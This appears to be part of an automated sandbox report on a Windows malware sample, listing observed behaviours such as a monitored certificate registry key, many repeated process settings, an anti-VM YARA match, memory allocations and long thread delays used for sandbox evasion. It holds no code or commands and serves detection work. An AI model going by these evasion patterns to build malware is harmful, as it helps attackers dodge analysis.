          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTR
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: 9430000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: 7D40000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: A430000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: B430000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: BB30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: CB30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: DB30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: 4860000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239874Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239766Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239641Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239516Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239405Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239297Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239188Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239063Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238938Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238828Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238716Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238608Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238500Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238391Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238200Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599874Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599749Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599526Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599406Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599281Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598875Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598718Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598609Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598500Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598390Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598281Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598169Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598047Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597937Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597824Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597594Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597483Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597375Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597265Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597156Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597047Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596937Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596827Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596719Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596609Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596498Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596387Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596274Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596159Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596040Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595907Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595735Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595609Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595500Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595389Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595266Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595156Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595024Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594906Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594797Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594687Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594578Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594469Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594359Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594250Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594140Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594031Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 593922Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeWindow / User API: threadDelayed 1634Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeWindow / User API: threadDelayed 1110Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeWindow / User API: threadDelayed 3260Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeWindow / User API: threadDelayed 6570Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -13835058055282155s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239874s >= -30000sJump to behavior
